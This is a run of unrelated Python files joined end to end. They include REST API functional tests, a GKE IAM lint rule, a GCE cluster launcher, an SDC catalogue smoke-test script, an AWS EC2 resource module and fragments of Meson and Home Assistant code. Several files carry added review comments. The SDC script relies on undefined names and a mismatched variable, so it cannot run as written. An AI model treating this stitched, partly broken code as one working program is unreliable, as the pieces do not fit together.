        build_pot(src_subdir, options.project_id, sources)
        update_po(src_subdir, options.project_id, langs)
    elif command == 'build':
        if langs:
            build_translations(src_subdir, build_subdir, langs)
    elif command == 'install':
        install_dir = os.path.join(os.environ['MESON_INSTALL_PREFIX'], options.install_dir)
        if langs:
            build_translations(src_subdir, build_subdir, langs)
            merge_translations(build_subdir, abs_sources, langs)
        install_help(src_subdir, build_subdir, sources, media, langs, install_dir,
                     destdir, options.project_id, options.symlinks)

#
#Programa Lista 4, questão 1;
#Felipe Henrique Bastos Costa - 1615310032;
#
#
#
#


# Exercise: read five integers from the user and print the resulting list.
lista = []  # accumulates the numbers typed by the user
TOTAL = 5   # how many integers to read

for posicao in range(1, TOTAL + 1):
    # 'posicao' is the 1-based ordinal shown in the prompt (1st, 2nd, ...).
    numero = int(input("Informe o %dº numero inteiro para colocar em sua lista:\n" % posicao))
    lista.append(numero)

print("A lista de informada foi:\n%s" % lista)

# vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2016 Eugene Frolov <eugene@frolov.net.ru>
#
# All Rights Reserved.
#
#    Licensed under the Apache License, Version 2.0 (the "License"); you may
#    not use this file except in compliance with the License. You may obtain
#    a copy of the License at
#
#         http://www.apache.org/licenses/LICENSE-2.0
#
#    Unless required by applicable law or agreed to in writing, software
#    distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
#    WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
#    License for the specific language governing permissions and limitations
#    under the License.

import random
import uuid as pyuuid

import mock
import requests
from six.moves.urllib import parse

from restalchemy.common import utils
from restalchemy.storage import exceptions
from restalchemy.storage.sql import engines
from restalchemy.tests.functional.restapi.ra_based.microservice import (
    storable_models as models)
from restalchemy.tests.functional.restapi.ra_based.microservice import consts
from restalchemy.tests.functional.restapi.ra_based.microservice import service
from restalchemy.tests.unit import base


# Endpoint templates used by the functional tests.  Each contains a
# '%s'-style placeholder: the first is filled with the service port (see
# BaseResourceTestCase.get_endpoint), later ones with resource UUIDs.
TEMPL_SERVICE_ENDPOINT = utils.lastslash("http://127.0.0.1:%s/")
TEMPL_ROOT_COLLECTION_ENDPOINT = TEMPL_SERVICE_ENDPOINT
TEMPL_V1_COLLECTION_ENDPOINT = utils.lastslash(parse.urljoin(
    TEMPL_SERVICE_ENDPOINT, 'v1'))
TEMPL_VMS_COLLECTION_ENDPOINT = utils.lastslash(parse.urljoin(
    TEMPL_V1_COLLECTION_ENDPOINT, 'vms'))
TEMPL_VM_RESOURCE_ENDPOINT = parse.urljoin(TEMPL_VMS_COLLECTION_ENDPOINT, '%s')
TEMPL_POWERON_ACTION_ENDPOINT = parse.urljoin(
    utils.lastslash(TEMPL_VM_RESOURCE_ENDPOINT),
    'actions/poweron/invoke')
TEMPL_PORTS_COLLECTION_ENDPOINT = utils.lastslash(parse.urljoin(
    utils.lastslash(TEMPL_VM_RESOURCE_ENDPOINT), 'ports'))
TEMPL_PORT_RESOURCE_ENDPOINT = parse.urljoin(TEMPL_PORTS_COLLECTION_ENDPOINT,
                                             '%s')


class BaseResourceTestCase(base.BaseTestCase):
    """Base class for the REST API functional tests.

    setUp creates the ``vms`` table in the configured database and starts a
    real REST service on a randomly chosen local port; tearDown stops the
    service and drops the table again.
    """

    def get_endpoint(self, template, *args):
        # Fill an endpoint template with the service port plus any extra
        # positional pieces (resource UUIDs, ...).
        return template % ((self.service_port,) + tuple(args))

    def setUp(self):
        super(BaseResourceTestCase, self).setUp()
        engines.engine_factory.configure_factory(consts.DATABASE_URI)
        engine = engines.engine_factory.get_engine()
        self.session = engine.get_session()
        self.session.execute("""CREATE TABLE IF NOT EXISTS vms (
            uuid CHAR(36) NOT NULL,
            state VARCHAR(10) NOT NULL,
            name VARCHAR(255) NOT NULL,
            PRIMARY KEY (uuid)
        ) ENGINE=InnoDB DEFAULT CHARSET=utf8;""", None)
        # NOTE(review): a random port in [2100, 2200) could collide with an
        # already-bound port; the tests assume this range is free.
        self.service_port = random.choice(range(2100, 2200))
        url = parse.urlparse(self.get_endpoint(TEMPL_SERVICE_ENDPOINT))
        self._service = service.RESTService(bind_host=url.hostname,
                                            bind_port=url.port)
        self._service.start()

    def tearDown(self):
        super(BaseResourceTestCase, self).tearDown()
        self._service.stop()
        self.session.execute("DROP TABLE IF EXISTS vms;", None)


class TestRootResourceTestCase(BaseResourceTestCase):
    """Tests for the API root resource."""

    def test_get_versions_list(self):
        # The root collection must advertise the available API versions.
        endpoint = self.get_endpoint(TEMPL_ROOT_COLLECTION_ENDPOINT)

        response = requests.get(endpoint)

        self.assertEqual(200, response.status_code)
        self.assertEqual(["v1"], response.json())


class TestVersionsResourceTestCase(BaseResourceTestCase):
    """Tests for the v1 version resource."""

    def test_get_resources_list(self):
        # The v1 collection must list its top-level resources.
        endpoint = self.get_endpoint(TEMPL_V1_COLLECTION_ENDPOINT)

        response = requests.get(endpoint)

        self.assertEqual(200, response.status_code)
        self.assertEqual(["vms"], response.json())


class TestVMResourceTestCase(BaseResourceTestCase):
    """CRUD, action-invoke and collection tests for the /v1/vms resource."""

    def _insert_vm_to_db(self, uuid, name, state):
        # Seed the DB through the model layer so the REST API can be tested
        # against known state.
        vm = models.VM(uuid=uuid, name=name, state=state)
        vm.save()

    def _vm_exists_in_db(self, uuid):
        # EAFP: get_one raises RecordNotFound when the row is absent.
        try:
            models.VM.objects.get_one(filters={'uuid': uuid})
            return True
        except exceptions.RecordNotFound:
            return False

    @mock.patch('uuid.uuid4')
    def test_create_vm_resource_successful(self, uuid4_mock):
        # Pin uuid4 so the service assigns a predictable resource UUID.
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        uuid4_mock.return_value = RESOURCE_ID
        vm_request_body = {
            "name": "test"
        }
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "test",
            "state": "off"
        }
        LOCATION = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT, RESOURCE_ID)

        response = requests.post(self.get_endpoint(
            TEMPL_VMS_COLLECTION_ENDPOINT), json=vm_request_body)

        # 201 Created with a Location header pointing at the new resource.
        self.assertEqual(response.status_code, 201)
        self.assertEqual(response.headers['location'], LOCATION)
        self.assertEqual(response.json(), vm_response_body)

    def test_get_vm_resource_by_uuid_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="test", state="off")
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "test",
            "state": "off"
        }
        VM_RES_ENDPOINT = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                            RESOURCE_ID)

        response = requests.get(VM_RES_ENDPOINT)

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)

    def test_update_vm_resource_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="old", state="off")
        vm_request_body = {
            "name": "new"
        }
        # PUT only changes the name; uuid and state must stay untouched.
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "new",
            "state": "off"
        }
        VM_RES_ENDPOINT = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                            RESOURCE_ID)

        response = requests.put(VM_RES_ENDPOINT, json=vm_request_body)

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)

    def test_delete_vm_resource_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="test", state="off")

        VM_RES_ENDPOINT = self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                            RESOURCE_ID)

        response = requests.delete(VM_RES_ENDPOINT)

        # 204 No Content, and the row must be gone from the DB.
        self.assertEqual(response.status_code, 204)
        self.assertFalse(self._vm_exists_in_db(RESOURCE_ID))

    def test_process_vm_action_successful(self):
        RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        self._insert_vm_to_db(uuid=RESOURCE_ID, name="test", state="off")
        # Invoking the poweron action should flip state from "off" to "on".
        vm_response_body = {
            "uuid": str(RESOURCE_ID),
            "name": "test",
            "state": "on"
        }
        POWERON_ACT_ENDPOINT = self.get_endpoint(TEMPL_POWERON_ACTION_ENDPOINT,
                                                 RESOURCE_ID)

        response = requests.post(POWERON_ACT_ENDPOINT)

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)

    def test_get_collection_vms_successful(self):
        RESOURCE_ID1 = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        RESOURCE_ID2 = pyuuid.UUID("00000000-0000-0000-0000-000000000002")
        self._insert_vm_to_db(uuid=RESOURCE_ID1, name="test1", state="off")
        self._insert_vm_to_db(uuid=RESOURCE_ID2, name="test2", state="on")
        # NOTE(review): the expected body assumes the collection is returned
        # in insertion (uuid) order — confirm the API guarantees ordering.
        vm_response_body = [{
            "uuid": str(RESOURCE_ID1),
            "name": "test1",
            "state": "off"
        }, {
            "uuid": str(RESOURCE_ID2),
            "name": "test2",
            "state": "on"
        }]

        response = requests.get(self.get_endpoint(
            TEMPL_VMS_COLLECTION_ENDPOINT))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), vm_response_body)


class TestNestedResourceTestCase(BaseResourceTestCase):
    """Tests for ports nested under a VM (/v1/vms/<uuid>/ports)."""

    def setUp(self):
        super(TestNestedResourceTestCase, self).setUp()
        # ports.vm is a foreign key into the vms table created by the base
        # class, so this table must be created after (and dropped before) it.
        self.session.execute("""CREATE TABLE IF NOT EXISTS ports (
            uuid CHAR(36) NOT NULL,
            mac CHAR(17) NOT NULL,
            vm CHAR(36) NOT NULL,
            PRIMARY KEY (uuid),
            CONSTRAINT FOREIGN KEY ix_vms_uuid (vm) REFERENCES vms (uuid)
        ) ENGINE=InnoDB DEFAULT CHARSET=utf8;""", None)
        self.vm1 = models.VM(
            uuid=pyuuid.UUID("00000000-0000-0000-0000-000000000001"),
            name="vm1",
            state="on")
        self.vm1.save(session=self.session)
        self.vm2 = models.VM(
            uuid=pyuuid.UUID("00000000-0000-0000-0000-000000000002"),
            name="vm2",
            state="off")
        self.vm2.save(session=self.session)
        self.session.commit()

    def tearDown(self):
        # Drop ports before the base class drops vms (FK dependency).
        self.session.execute("DROP TABLE IF EXISTS ports;", None)
        super(TestNestedResourceTestCase, self).tearDown()

    @mock.patch('uuid.uuid4')
    def test_create_nested_resource_successful(self, uuid4_mock):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        # Pin uuid4 so the created port gets a predictable UUID.
        uuid4_mock.return_value = PORT_RESOURCE_ID
        port_request_body = {
            "mac": "00:00:00:00:00:03"
        }
        # The parent VM is rendered as the path of its resource URI.
        port_response_body = {
            "uuid": str(PORT_RESOURCE_ID),
            "mac": "00:00:00:00:00:03",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }
        LOCATION = self.get_endpoint(TEMPL_PORT_RESOURCE_ENDPOINT,
                                     VM_RESOURCE_ID,
                                     PORT_RESOURCE_ID)

        response = requests.post(
            self.get_endpoint(TEMPL_PORTS_COLLECTION_ENDPOINT, VM_RESOURCE_ID),
            json=port_request_body)

        self.assertEqual(response.status_code, 201)
        self.assertEqual(response.headers['location'], LOCATION)
        self.assertEqual(response.json(), port_response_body)

    def test_get_nested_resource_successful(self):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        port = models.Port(uuid=PORT_RESOURCE_ID,
                           mac="00:00:00:00:00:03",
                           vm=self.vm1)
        port.save(session=self.session)
        self.session.commit()
        port_response_body = {
            "uuid": str(PORT_RESOURCE_ID),
            "mac": "00:00:00:00:00:03",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }

        response = requests.get(
            self.get_endpoint(TEMPL_PORT_RESOURCE_ENDPOINT,
                              VM_RESOURCE_ID,
                              PORT_RESOURCE_ID))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), port_response_body)

    def test_get_ports_collection_successful(self):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT1_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        PORT2_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000004")
        PORT3_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000005")
        port1 = models.Port(uuid=PORT1_RESOURCE_ID,
                            mac="00:00:00:00:00:03",
                            vm=self.vm1)
        port1.save(session=self.session)
        port2 = models.Port(uuid=PORT2_RESOURCE_ID,
                            mac="00:00:00:00:00:04",
                            vm=self.vm1)
        port2.save(session=self.session)
        # port3 belongs to vm2, so it must NOT show up in vm1's collection.
        port3 = models.Port(uuid=PORT3_RESOURCE_ID,
                            mac="00:00:00:00:00:05",
                            vm=self.vm2)
        port3.save(session=self.session)
        ports_response_body = [{
            "uuid": str(PORT1_RESOURCE_ID),
            "mac": "00:00:00:00:00:03",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }, {
            "uuid": str(PORT2_RESOURCE_ID),
            "mac": "00:00:00:00:00:04",
            "vm": parse.urlparse(
                self.get_endpoint(TEMPL_VM_RESOURCE_ENDPOINT,
                                  VM_RESOURCE_ID)).path
        }]
        self.session.commit()

        response = requests.get(
            self.get_endpoint(TEMPL_PORTS_COLLECTION_ENDPOINT, VM_RESOURCE_ID))

        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json(), ports_response_body)

    def test_delete_nested_resource_successful(self):
        VM_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000001")
        PORT_RESOURCE_ID = pyuuid.UUID("00000000-0000-0000-0000-000000000003")
        port = models.Port(uuid=PORT_RESOURCE_ID,
                           mac="00:00:00:00:00:03",
                           vm=self.vm1)
        port.save(session=self.session)
        self.session.commit()

        response = requests.delete(
            self.get_endpoint(TEMPL_PORT_RESOURCE_ENDPOINT,
                              VM_RESOURCE_ID,
                              PORT_RESOURCE_ID))

        # 204 No Content, and the row must be gone from the DB.
        self.assertEqual(response.status_code, 204)
        self.assertRaises(exceptions.RecordNotFound,
                          models.Port.objects.get_one,
                          filters={'uuid': PORT_RESOURCE_ID})

# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""GKE nodes service account permissions for logging.

The service account used by GKE nodes should have the logging.logWriter
role, otherwise ingestion of logs won't work.
"""

from gcpdiag import lint, models
from gcpdiag.queries import gke, iam

# IAM role the node service account needs to write logs to Cloud Logging.
ROLE = 'roles/logging.logWriter'


def prefetch_rule(context: models.Context):
  """Pre-warm the IAM policy cache for every project that owns a cluster."""
  cluster_projects = {c.project_id for c in gke.get_clusters(context).values()}
  for project_id in cluster_projects:
    iam.get_project_policy(project_id)


def run_rule(context: models.Context, report: lint.LintReportRuleInterface):
  """Verify node pool service accounts can write logs.

  For each cluster with logging enabled, every node pool's service account
  must exist, be enabled, and hold roles/logging.logWriter.
  """
  # Find all clusters with logging enabled.
  clusters = gke.get_clusters(context)
  # NOTE(review): the policy is fetched only for context.project_id, while
  # prefetch_rule warms policies for every cluster project — confirm clusters
  # can only belong to context.project_id here.
  iam_policy = iam.get_project_policy(context.project_id)
  if not clusters:
    report.add_skipped(None, 'no clusters found')
  for _, c in sorted(clusters.items()):
    if not c.has_logging_enabled():
      report.add_skipped(c, 'logging disabled')
    else:
      # Verify service-account permissions for every nodepool.
      for np in c.nodepools:
        sa = np.service_account
        if not iam.is_service_account_enabled(sa, context.project_id):
          report.add_failed(np, f'service account disabled or deleted: {sa}')
        elif not iam_policy.has_role_permissions(f'serviceAccount:{sa}', ROLE):
          report.add_failed(np, f'service account: {sa}\nmissing role: {ROLE}')
        else:
          report.add_ok(np)

""" Launcher functionality for the Google Compute Engine (GCE)
"""
import json
import logging
import os

from dcos_launch import onprem, util
from dcos_launch.platforms import gcp
from dcos_test_utils.helpers import Host
from googleapiclient.errors import HttpError

# Module-level logger, stdlib logging convention.
log = logging.getLogger(__name__)


def get_credentials(env=None) -> tuple:
    """Return ``(json_credentials, path)`` for the GCP service account.

    GCE_CREDENTIALS (inline JSON, path is None) takes precedence over
    GOOGLE_APPLICATION_CREDENTIALS (path to a JSON credentials file).

    :param env: mapping to read from; defaults to a copy of os.environ.
    :raises util.LauncherError: when neither variable is present.
    """
    env = os.environ.copy() if env is None else env
    if 'GCE_CREDENTIALS' in env:
        return env['GCE_CREDENTIALS'], None
    if 'GOOGLE_APPLICATION_CREDENTIALS' in env:
        credentials_path = env['GOOGLE_APPLICATION_CREDENTIALS']
        return util.read_file(credentials_path), credentials_path
    raise util.LauncherError(
        'MissingParameter', 'Either GCE_CREDENTIALS or GOOGLE_APPLICATION_CREDENTIALS must be set in env')


class OnPremLauncher(onprem.AbstractOnpremLauncher):
    # Launches a homogeneous cluster of plain GMIs intended for onprem DC/OS
    """Launcher for a homogeneous GCE cluster used by onprem DC/OS installs."""

    def __init__(self, config: dict, env=None):
        # Only the JSON string is needed here; the credentials file path (if
        # any) is discarded.
        creds_string, _ = get_credentials(env)
        self.gcp_wrapper = gcp.GcpWrapper(json.loads(creds_string))
        self.config = config

    @property
    def deployment(self):
        """ Builds a BareClusterDeployment instance with self.config, but only returns it successfully if the
        corresponding real deployment (active machines) exists and doesn't contain any errors.
        """
        try:
            deployment = gcp.BareClusterDeployment(self.gcp_wrapper, self.config['deployment_name'],
                                                   self.config['gce_zone'])
            info = deployment.get_info()
            errors = info['operation'].get('error')
            if errors:
                raise util.LauncherError('DeploymentContainsErrors', str(errors))
            return deployment
        except HttpError as e:
            # Translate the GCP 404 into the launcher's own error type.
            if e.resp.status == 404:
                raise util.LauncherError('DeploymentNotFound',
                                         "The deployment you are trying to access doesn't exist") from e
            raise e

    def create(self) -> dict:
        """Create the GCE deployment described by self.config and return it."""
        self.key_helper()
        # One extra node for the bootstrap host (see get_bootstrap_host).
        node_count = 1 + (self.config['num_masters'] + self.config['num_public_agents']
                          + self.config['num_private_agents'])
        gcp.BareClusterDeployment.create(
            self.gcp_wrapper,
            self.config['deployment_name'],
            self.config['gce_zone'],
            node_count,
            self.config['disk_size'],
            self.config['disk_type'],
            self.config['source_image'],
            self.config['machine_type'],
            self.config['image_project'],
            self.config['ssh_user'],
            self.config['ssh_public_key'],
            self.config['disable_updates'],
            self.config['use_preemptible_vms'],
            tags=self.config.get('tags'))
        return self.config

    def key_helper(self):
        """ Generates a public key and a private key and stores them in the config. The public key will be applied to
        all the instances in the deployment later on when wait() is called.
        """
        if self.config['key_helper']:
            private_key, public_key = util.generate_rsa_keypair()
            self.config['ssh_private_key'] = private_key.decode()
            self.config['ssh_public_key'] = public_key.decode()

    def get_cluster_hosts(self) -> [Host]:
        # All hosts except the first (bootstrap) one.
        return list(self.deployment.hosts)[1:]

    def get_bootstrap_host(self) -> Host:
        # By convention the first host in the deployment is the bootstrap node.
        return list(self.deployment.hosts)[0]

    def wait(self):
        """ Waits for the deployment to complete: first, the network that will contain the cluster is deployed. Once
        the network is deployed, a firewall for the network and an instance template are deployed. Finally,
        once the instance template is deployed, an instance group manager and all its instances are deployed.
        """
        self.deployment.wait_for_completion()

    def delete(self):
        """ Deletes all the resources associated with the deployment (instance template, network, firewall, instance
        group manager and all its instances.
        """
        self.deployment.delete()

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014 Telefonica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
#        http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with opensource@tid.es

'''
Created on 16/04/2013

@author: henar
'''
import httplib
import sys
import os
from xml.dom.minidom import parse, parseString
from xml.dom.minidom import getDOMImplementation
from xml.etree.ElementTree import Element, SubElement, tostring
import md5
import httplib, urllib
import utils



# Smoke-test script for the SDC (software catalogue) REST API: lists catalog
# products, installs a product on a VM and then uninstalls it.
#
# NOTE(review): this is Python 2 code (httplib, md5 imports above) and it
# references configuration names that are never defined in this file:
# keystone_ip, keystone_port, user, password, project, vdc, domine, port,
# product_name, product_version, vm_ip, vm_fqn.  They must be injected
# elsewhere, otherwise every use below raises NameError.  Also note the
# mismatch between 'productname' (assigned below) and 'product_name' (used
# afterwards) — confirm which one is intended.
token = utils.obtainToken(keystone_ip, keystone_port, user, password, project)
print(token)

# All requests are XML and authenticated with the Keystone token.
headers = {'Content-Type': 'application/xml', 'X-Auth-Token': token, 'Tenant-ID': vdc}
print(headers)

print('Get products in the software catalogue: ')
resource = "/sdc/rest/catalog/product"
data1 = utils.doRequestHttpOperation(domine, port, resource, 'GET', None, headers)

dom = parseString(data1)
try:
    product = (dom.getElementsByTagName('product'))[0]
    productname = product.firstChild.firstChild.nodeValue
    print('First product in the software catalogue: ' + productname)

# NOTE(review): bare except hides the real failure (XML parse error, empty
# catalogue, ...); consider catching IndexError/AttributeError explicitly.
except:
    print ("Error in the request to get products")
    sys.exit(1)

print('Get Product Details ' + product_name )
data1 = utils.doRequestHttpOperation(domine, port, "/sdc/rest/catalog/product/" + product_name, 'GET', None, headers)
print("  OK")

print('Get Product Releases ' + product_name )
data1 = utils.doRequestHttpOperation(domine, port, "/sdc/rest/catalog/product/" + product_name + "/release", 'GET',
    None, headers)
print("  OK")

print('Get Product Release Info ' + product_name + " " + product_version )
data1 = utils.doRequestHttpOperation(domine, port,
    "/sdc/rest/catalog/product/" + product_name + "/release/" + product_version, 'GET', None, headers)
print("  OK")

print('Get Product Attributes ' + product_name )
data1 = utils.doRequestHttpOperation(domine, port, "/sdc/rest/catalog/product/" + product_name + '/attributes', 'GET',
    None, headers)
print("  OK")

resource_product_instance = "/sdc/rest/vdc/" + vdc + "/productInstance"
print('Install a product in VM. Product ' + product_name )

# Build the XML payload describing the product instance to install.
productInstanceDto = utils.createProductInstanceDto(vm_ip, vm_fqn, product_name, product_version)
print (tostring(productInstanceDto))
task = utils.doRequestHttpOperation(domine, port, resource_product_instance, 'POST', tostring(productInstanceDto),
    headers)
print (task)
# The install is asynchronous; poll the returned task until it finishes.
status = utils.processTask(domine, port, task)
print ("  " + status)

# Instance ids follow the '<fqn>_<product>_<version>' convention.
resource_get_info_product_instance = "/sdc/rest/vdc/" + vdc + "/productInstance/" + vm_fqn + '_' + product_name + '_' + product_version
print('Get Product Instance Info. Product ' + product_name )
data = utils.doRequestHttpOperation(domine, port, resource_get_info_product_instance, 'GET', None)
print(data)
status = utils.processProductInstanceStatus(data)
#if  status != 'INSTALLED':
# print("Status not correct" + status)

resource_delete_product_instance = "/sdc/rest/vdc/" + vdc + "/productInstance/" + vm_fqn + '_' + product_name + '_' + product_version
print('Get Delete Product Instance ' + product_name )
task = utils.doRequestHttpOperation(domine, port, resource_delete_product_instance, 'DELETE', None)
status = utils.processTask(domine, port, task)
print("  OK")
data = utils.doRequestHttpOperation(domine, port, resource_delete_product_instance, 'GET', None)
statusProduct = utils.processProductInstanceStatus(data)
#if  status != 'UNINSTALLED':
# print("Status not correct" + statusProduct)






    

    
    

    

    
    
 



# Copyright 2014-2015 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

from touchdown import ssh
from touchdown.aws.ec2.keypair import KeyPair
from touchdown.aws.iam import InstanceProfile
from touchdown.aws.vpc import SecurityGroup, Subnet
from touchdown.core import argument, errors, serializers
from touchdown.core.plan import Plan, Present
from touchdown.core.resource import Resource

from ..account import BaseAccount
from ..common import SimpleApply, SimpleDescribe, SimpleDestroy


class BlockDevice(Resource):
    """A block device mapping entry attached to an ec2_instance."""

    resource_name = "block_device"

    virtual_name = argument.String(field="VirtualName")
    device_name = argument.String(field="DeviceName")
    # Serialized as an empty "NoDevice" string, which is how the EC2 API
    # expresses "suppress this device from the AMI's mapping".
    disabled = argument.Boolean(field="NoDevice", serializer=serializers.Const(""))


class NetworkInterface(Resource):
    """A network interface specification for an ec2_instance."""

    resource_name = "network_interface"

    # Whether the interface gets a public IP on launch.
    public = argument.Boolean(default=False, field="AssociatePublicIpAddress")
    security_groups = argument.ResourceList(SecurityGroup, field="Groups")


class Instance(Resource):
    """Declarative description of an EC2 instance.

    Each argument's ``field`` names the corresponding run_instances API
    parameter; nested resources are serialized via their own serializers.
    """

    resource_name = "ec2_instance"

    # "Name" is applied as a tag (group="tags"), not a top-level API field.
    name = argument.String(min=3, max=128, field="Name", group="tags")
    ami = argument.String(field="ImageId")
    instance_type = argument.String(field="InstanceType")
    key_pair = argument.Resource(KeyPair, field="KeyName")
    subnet = argument.Resource(Subnet, field="SubnetId")
    # The API expects {"IamInstanceProfile": {"Name": <profile name>}}.
    instance_profile = argument.Resource(
        InstanceProfile,
        field="IamInstanceProfile",
        serializer=serializers.Dict(Name=serializers.Property("InstanceProfileName")),
    )

    user_data = argument.String(field="UserData")

    network_interfaces = argument.ResourceList(
        NetworkInterface, field="NetworkInterfaces"
    )

    block_devices = argument.ResourceList(
        BlockDevice,
        field="BlockDeviceMappings",
        serializer=serializers.List(serializers.Resource()),
    )

    security_groups = argument.ResourceList(SecurityGroup, field="SecurityGroupIds")

    tags = argument.Dict()

    account = argument.Resource(BaseAccount)


class Describe(SimpleDescribe, Plan):
    """Locate an existing EC2 instance by its Name tag."""

    resource = Instance
    service_name = "ec2"
    api_version = "2015-10-01"
    describe_action = "describe_instances"
    describe_envelope = "Reservations[].Instances[]"
    key = "InstanceId"

    def get_describe_filters(self):
        # Match any instance that is not terminated/terminating, so e.g. a
        # stopped instance is found rather than treated as absent.
        return {
            "Filters": [
                {"Name": "tag:Name", "Values": [self.resource.name]},
                {
                    "Name": "instance-state-name",
                    "Values": [
                        "pending",
                        "running",
                        "shutting-down",
                        # BUG FIX: was " stopping" (leading space), a value
                        # the EC2 filter can never match, so instances in the
                        # 'stopping' state were invisible to describe.
                        "stopping",
                        "stopped",
                    ],
                },
            ]
        }


class Apply(SimpleApply, Describe):
    """Create the instance via run_instances and wait until it is running."""

    create_action = "run_instances"
    create_envelope = "Instances[0]"
    # create_response = 'id-only'
    waiter = "instance_running"

    # At minimum a name must be present before the instance can be created.
    signature = (Present("name"),)

    def get_create_serializer(self):
        # Always launch exactly one instance per resource.
        return serializers.Resource(MaxCount=1, MinCount=1)


class Destroy(SimpleDestroy, Describe):
    """Terminate the EC2 instance and wait until termination completes."""

    destroy_action = "terminate_instances"
    waiter = "instance_terminated"

    def get_destroy_serializer(self):
        """Serialize the terminate_instances call: a one-element InstanceIds list."""
        return serializers.Dict(
            InstanceIds=serializers.ListOfOne(serializers.Property("InstanceId"))
        )


class SSHInstance(ssh.Instance):
    """Adapts an EC2 instance so it can be used as an SSH connection target."""

    resource_name = "ec2_instance"
    input = Instance

    def get_network_id(self, runner):
        """Return the VpcId of the described instance, or None if unknown."""
        # FIXME: We can save on some steps if we only do this once
        obj = runner.get_plan(self.adapts).describe_object()
        return obj.get("VpcId", None)

    def get_serializer(self, runner, **kwargs):
        """Pick the best address to SSH to.

        Prefers the private IP when the SSH proxy instance shares this
        instance's VPC, then the public DNS name, then the public IP.
        Raises errors.Error when no reachable address exists.
        """
        obj = runner.get_plan(self.adapts).describe_object()

        # When tunnelling through a proxy in the same network, the private
        # address is reachable and avoids going out through NAT.
        if getattr(self.parent, "proxy", None) and self.parent.proxy.instance:
            if hasattr(self.parent.proxy.instance, "get_network_id"):
                network = self.parent.proxy.instance.get_network_id(runner)
                if network == self.get_network_id(runner):
                    return serializers.Const(obj["PrivateIpAddress"])

        if obj.get("PublicDnsName", ""):
            return serializers.Const(obj["PublicDnsName"])

        if obj.get("PublicIpAddress", ""):
            return serializers.Const(obj["PublicIpAddress"])

        raise errors.Error("Instance {} not available".format(self.adapts))

"""Support for monitoring OctoPrint sensors."""
from __future__ import annotations

from datetime import datetime, timedelta
import logging

from pyoctoprintapi import OctoprintJobInfo, OctoprintPrinterInfo

from homeassistant.components.sensor import (
    SensorDeviceClass,
    SensorEntity,
    SensorStateClass,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import PERCENTAGE, TEMP_CELSIUS
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity

from . import OctoprintDataUpdateCoordinator
